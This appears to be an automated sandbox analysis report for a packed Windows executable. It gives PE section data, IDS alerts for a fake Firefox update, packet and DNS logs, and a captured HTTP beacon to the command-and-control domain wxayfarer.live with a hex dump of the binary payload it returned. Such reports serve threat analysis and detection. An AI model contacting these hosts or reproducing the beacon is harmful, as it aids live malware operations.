                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            0x10000x5f0000x2d8008a098440eed81a6874ddb47839d13a5aFalse0.998052240728022data7.982701324787569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x600000x3000x200ff6a9ea54eaa641989417e325282354dFalse0.87109375data6.554420371420352IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata 0x610000x10000x200f47b289bcee0e13a937cc29db13607bfFalse0.150390625data1.0437720338377494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            tjdrfttm0x620000x29b0000x29a20010e9d048355406b117613e6e22210607unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            msexgfdi0x2fd0000x10000x6006910ed3650d00c45e48afb1128b1e2acFalse0.6048177083333334data5.158292030060077IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .taggant0x2fe0000x30000x2200dd16c5dc6dc6472db6a09d11e14be62dFalse0.06295955882352941DOS executable (COM)0.7845590861998107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_MANIFEST0x2fbec80x2a5XML 1.0 document, ASCII text0.4963072378138848
                                                            DLLImport
                                                            kernel32.dlllstrcpy

                                                            Download Network PCAP: filteredfull

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2025-03-25T08:16:41.089875+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749681104.21.112.1443TCP
                                                            2025-03-25T08:16:42.812374+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749682104.21.112.1443TCP
                                                            2025-03-25T08:16:43.964393+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749683104.21.112.1443TCP
                                                            2025-03-25T08:16:45.016095+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749684104.21.112.1443TCP
                                                            2025-03-25T08:16:47.123472+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749685104.21.112.1443TCP
                                                            2025-03-25T08:16:48.152559+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749686104.21.112.1443TCP
                                                            2025-03-25T08:16:49.680318+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749687104.21.112.1443TCP
                                                            • Total Packets: 103
                                                            • 443 (HTTPS)
                                                            • 80 (HTTP)
                                                            • 53 (DNS)
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Mar 25, 2025 08:16:40.835187912 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:40.835247040 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:40.835316896 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:40.870919943 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:40.870940924 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.089776039 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.089874983 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.118350029 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.118379116 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.118942976 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.162763119 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.222449064 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.222477913 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.222635031 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.683051109 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.683176041 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.683233023 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.683274031 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.683358908 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.683403969 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.683413029 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.683520079 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.683554888 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.683562994 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.683655977 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.683700085 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.683707952 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.683804989 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.683851004 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.683859110 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.725246906 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.725271940 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.772126913 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.790311098 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.790488005 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.790551901 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.790575981 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.791157007 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.791205883 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.791214943 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.791333914 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.791377068 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.791383982 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.791578054 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.791621923 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.791629076 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.791737080 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.791779041 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.791785955 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.791891098 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.791934013 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.791940928 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.792037010 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.792092085 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.792098999 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.792206049 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.792249918 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.792257071 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.792444944 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.792494059 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.903515100 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.903561115 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:41.903575897 CET49681443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:41.903583050 CET44349681104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:42.611037970 CET49682443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:42.611083031 CET44349682104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:42.611182928 CET49682443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:42.611572027 CET49682443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:42.611583948 CET44349682104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:42.812273026 CET44349682104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:42.812374115 CET49682443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:42.815562010 CET49682443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:42.815577030 CET44349682104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:42.816010952 CET44349682104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:42.818238974 CET49682443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:42.818695068 CET49682443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:42.818742990 CET44349682104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:43.369568110 CET44349682104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:43.369867086 CET44349682104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:43.369968891 CET49682443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:43.370007992 CET49682443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:43.370023966 CET44349682104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:43.756933928 CET49683443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:43.756984949 CET44349683104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:43.757086039 CET49683443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:43.757438898 CET49683443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:43.757453918 CET44349683104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:43.964236021 CET44349683104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:43.964392900 CET49683443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:43.966113091 CET49683443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:43.966124058 CET44349683104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:43.966435909 CET44349683104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:43.967936039 CET49683443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:43.968144894 CET49683443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:43.968179941 CET44349683104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:43.968230963 CET49683443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:44.008342981 CET44349683104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:44.455846071 CET44349683104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:44.456067085 CET44349683104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:44.456146002 CET49683443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:44.457310915 CET49683443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:44.457329988 CET44349683104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:44.809952974 CET49684443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:44.810005903 CET44349684104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:44.810091019 CET49684443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:44.810450077 CET49684443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:44.810466051 CET44349684104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:45.016007900 CET44349684104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:45.016094923 CET49684443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:45.017623901 CET49684443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:45.017637014 CET44349684104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:45.017883062 CET44349684104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:45.019104004 CET49684443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:45.019284010 CET49684443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:45.019315004 CET44349684104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:45.019371033 CET49684443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:45.019381046 CET44349684104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:45.581334114 CET44349684104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:45.581490040 CET44349684104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:45.581581116 CET49684443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:45.581773996 CET49684443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:45.581796885 CET44349684104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:46.921706915 CET49685443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:46.921763897 CET44349685104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:46.921838045 CET49685443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:46.922210932 CET49685443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:46.922229052 CET44349685104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:47.123317003 CET44349685104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:47.123471975 CET49685443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:47.124902964 CET49685443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:47.124917030 CET44349685104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:47.125164032 CET44349685104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:47.126590967 CET49685443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:47.126802921 CET49685443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:47.126832008 CET44349685104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:47.486116886 CET44349685104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:47.486404896 CET44349685104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:47.486407995 CET49685443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:47.486465931 CET49685443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:47.940716982 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:47.940798998 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:47.940903902 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:47.941371918 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:47.941392899 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.152360916 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.152559042 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.154073000 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.154086113 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.154464006 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.155833960 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.156645060 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.156677008 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.156781912 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.156816006 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.156939030 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.156958103 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.157099962 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.157124996 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.157293081 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.157315969 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.157481909 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.157501936 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.157514095 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.157525063 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.157670975 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.157691002 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.157712936 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.157850981 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.157875061 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.204330921 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.204750061 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.204804897 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.204833984 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.248341084 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:48.248480082 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:48.254800081 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.442689896 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.442801952 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.442950010 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.443330050 CET49686443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.443346024 CET44349686104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.479619026 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.479669094 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.479753971 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.480149031 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.480165005 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.680216074 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.680318117 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.682045937 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.682073116 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.682310104 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:49.683615923 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.683649063 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:49.683696032 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:50.226802111 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:50.226870060 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:50.226933956 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:50.227140903 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:50.227169037 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:50.227181911 CET49687443192.168.2.7104.21.112.1
                                                            Mar 25, 2025 08:16:50.227190018 CET44349687104.21.112.1192.168.2.7
                                                            Mar 25, 2025 08:16:50.231693029 CET4968880192.168.2.7176.113.115.7
                                                            Mar 25, 2025 08:16:51.240963936 CET4968880192.168.2.7176.113.115.7
                                                            Mar 25, 2025 08:16:53.240995884 CET4968880192.168.2.7176.113.115.7
                                                            Mar 25, 2025 08:16:57.240966082 CET4968880192.168.2.7176.113.115.7
                                                            Mar 25, 2025 08:17:05.241173029 CET4968880192.168.2.7176.113.115.7
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Mar 25, 2025 08:16:40.695981979 CET5207653192.168.2.71.1.1.1
                                                            Mar 25, 2025 08:16:40.812167883 CET53520761.1.1.1192.168.2.7
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Mar 25, 2025 08:16:40.695981979 CET192.168.2.71.1.1.10x43bfStandard query (0)wxayfarer.liveA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Mar 25, 2025 08:16:40.812167883 CET1.1.1.1192.168.2.70x43bfNo error (0)wxayfarer.live104.21.112.1A (IP address)IN (0x0001)false
                                                            Mar 25, 2025 08:16:40.812167883 CET1.1.1.1192.168.2.70x43bfNo error (0)wxayfarer.live104.21.16.1A (IP address)IN (0x0001)false
                                                            Mar 25, 2025 08:16:40.812167883 CET1.1.1.1192.168.2.70x43bfNo error (0)wxayfarer.live104.21.64.1A (IP address)IN (0x0001)false
                                                            Mar 25, 2025 08:16:40.812167883 CET1.1.1.1192.168.2.70x43bfNo error (0)wxayfarer.live104.21.80.1A (IP address)IN (0x0001)false
                                                            Mar 25, 2025 08:16:40.812167883 CET1.1.1.1192.168.2.70x43bfNo error (0)wxayfarer.live104.21.32.1A (IP address)IN (0x0001)false
                                                            Mar 25, 2025 08:16:40.812167883 CET1.1.1.1192.168.2.70x43bfNo error (0)wxayfarer.live104.21.96.1A (IP address)IN (0x0001)false
                                                            Mar 25, 2025 08:16:40.812167883 CET1.1.1.1192.168.2.70x43bfNo error (0)wxayfarer.live104.21.48.1A (IP address)IN (0x0001)false
                                                            • wxayfarer.live
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.749681104.21.112.14436940C:\Users\user\Desktop\Qyk8RJnGN7.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-25 07:16:41 UTC265OUTPOST /ALosnz HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                            Content-Length: 51
                                                            Host: wxayfarer.live
                                                            2025-03-25 07:16:41 UTC51OUTData Raw: 75 69 64 3d 64 62 39 38 62 62 34 33 30 31 36 30 66 62 33 36 36 64 61 36 31 64 63 37 34 34 35 35 38 39 31 37 38 62 36 63 34 61 63 38 36 64 26 63 69 64 3d
                                                            Data Ascii: uid=db98bb430160fb366da61dc7445589178b6c4ac86d&cid=
                                                            2025-03-25 07:16:41 UTC786INHTTP/1.1 200 OK
                                                            Date: Tue, 25 Mar 2025 07:16:41 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 34161
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d5t335R6KlJKw4si0In4li0U1OpuabOQtQYCYE8sJ4gs69Q%2BmxK9CYuYyP84FT0A7yvTH0dn3puSVNaOhO7vf8b%2FQf445mUhVBzDknYhIMf3SI7jkr5v%2FygsZYi5xlik3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 925c9fcde8724283-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=99103&min_rtt=98528&rtt_var=21339&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2832&recv_bytes=952&delivery_rate=37785&cwnd=244&unsent_bytes=0&cid=d79b1182b4867e08&ts=612&x=0"
                                                            2025-03-25 07:16:41 UTC583INData Raw: 77 41 b7 36 fb 4f 53 72 a1 b5 3a 48 92 ef cf bb 84 68 dc 30 69 c4 29 2c ef af 02 61 51 cf 8c 00 73 26 a1 ad 37 bd b7 07 f1 bc 66 d0 e7 ae 54 df 18 d9 79 6d d0 44 66 c6 7a 81 f8 de 5b d2 72 b1 a9 89 2b 3e 60 af 3b d5 c8 32 be c5 19 f2 ac 38 88 65 36 e8 8d 23 c7 69 f9 26 d8 d2 35 88 0d a6 02 2c 15 27 46 22 6c e3 9f a8 df 0f 65 71 80 e5 d1 6a d9 71 34 69 b1 ee eb 36 36 e8 09 66 f6 0f 6e f2 e8 00 27 61 a7 32 ba 64 c4 05 97 8e e3 a8 5e ed aa eb 8d 0e fa 95 42 6a f2 c8 19 87 97 50 56 54 63 41 3c 8b 04 2a 83 dc 20 e3 82 27 55 9c 07 74 13 90 f8 7f b1 31 a4 72 4b 23 f3 d4 dc 96 3d 61 42 79 40 5d b9 ab e5 a5 01 c0 d2 d8 a3 2f 78 45 d2 f6 1b f6 db b7 e4 7d f5 b3 ec e0 2d 7d 20 49 a5 63 fd 72 25 9d 41 64 f7 d7 5b d0 fd f4 fa 46 54 3f 59 2d 8b b8 9b d9 07 a6 11 34 07
                                                            Data Ascii: wA6OSr:Hh0i),aQs&7fTymDfz[r+>`;28e6#i&5,'F"leqjq4i66fn'a2d^BjPVTcA<* 'Ut1rK#=aBy@]/xE}-} Icr%Ad[FT?Y-4
                                                            2025-03-25 07:16:41 UTC1369INData Raw: 9c 73 67 6f 76 85 f5 d8 b6 a0 20 b4 7c 42 0d c5 5d 44 02 60 07 ca f3 08 56 9a 02 8d b5 46 37 13 61 71 db bb ac e0 08 a5 2b 7e 0b 5c a5 42 2e 58 f0 64 ad 45 4f 41 9d a9 ae 2e 9c 36 b8 12 a0 97 98 5c 83 2b d7 34 68 9f d4 82 3c ea 9d 19 09 51 61 69 e7 d4 ec b0 bf 35 ce 41 01 96 a0 40 32 3a b9 97 10 8d db 6c 2a 55 22 8e 0f 79 1f e7 1a 97 81 49 16 73 ef 6b f0 50 39 2d fb c4 fe 30 dd ad e9 ec 05 72 9e f7 83 49 ff eb c4 58 59 23 d2 2f be 68 cd 3e a1 20 06 83 62 ac 28 f8 1f 8d 02 62 11 ab 86 5d a1 44 fa 01 a2 22 e4 80 91 3b 0e f3 75 dd 0e 08 8b 9a 02 9c 89 89 a9 c0 2e a9 34 78 2c 4c 9b a5 66 57 b3 15 df 15 93 32 da 0e f1 fb 99 e5 3e e5 cc 2b 11 30 ca 30 8e 34 d7 28 04 39 3d 5f 01 71 c2 9a 77 af dc 2a fc e6 57 bc 4e 43 74 db 4f 1a bd 39 8c 63 0f fa 4a a4 ab 88 ad
                                                            Data Ascii: sgov |B]D`VF7aq+~\B.XdEOA.6\+4h<Qai5A@2:l*U"yIskP9-0rIXY#/h> b(b]D";u.4x,LfW2>+004(9=_qw*WNCtO9cJ
                                                            2025-03-25 07:16:41 UTC1369INData Raw: 27 44 61 e0 bc b4 17 6b 69 ee 72 d5 f3 d8 2f 52 1b 6f 41 b8 7d b3 8e c5 ea 4d e6 06 1c 08 b4 ac 29 76 27 b7 b2 6f b8 70 fc cb da bb 6a 64 be 6b ca cf 5d a5 9c 34 90 79 c7 4a 05 29 60 c4 4b 54 0e 96 df ae 6c d9 ce 59 81 6c 49 17 88 77 69 2a 18 4a 42 65 76 0d 9a d6 1e 9d a4 93 80 6d 86 34 46 ac 7d c5 7a 0c 49 51 f5 3d e9 b6 5b 5a a8 5c 54 66 cd 3b 77 a5 e2 be 02 1c a6 f5 86 bb ae 33 87 0a f9 73 a0 89 aa b4 57 cd e7 08 35 7e 16 54 87 d7 b6 0a a3 71 22 a7 20 94 0a c5 4c 94 d5 b6 ef ea af 96 83 f8 7e 1f 17 a3 2d 18 3e fd c0 70 72 2f b8 3d 41 82 d2 24 f2 5c 1c b7 13 b0 09 b6 ea 73 62 bd 23 d3 75 c4 73 68 ca cb 0f f4 ba ae 77 9f af d3 25 b7 c2 b1 e1 3f 5d f4 f5 6a 02 77 b0 f3 40 ce 6c a7 f3 f4 f2 76 70 79 aa e2 53 08 88 18 bf 53 0b 42 a6 2f 63 9f 26 fc 32 5e ef
                                                            Data Ascii: 'Dakir/RoA}M)v'opjdk]4yJ)`KTlYlIwi*JBevm4F}zIQ=[Z\Tf;w3sW5~Tq" L~->pr/=A$\sb#ushw%?]jw@lvpySSB/c&2^
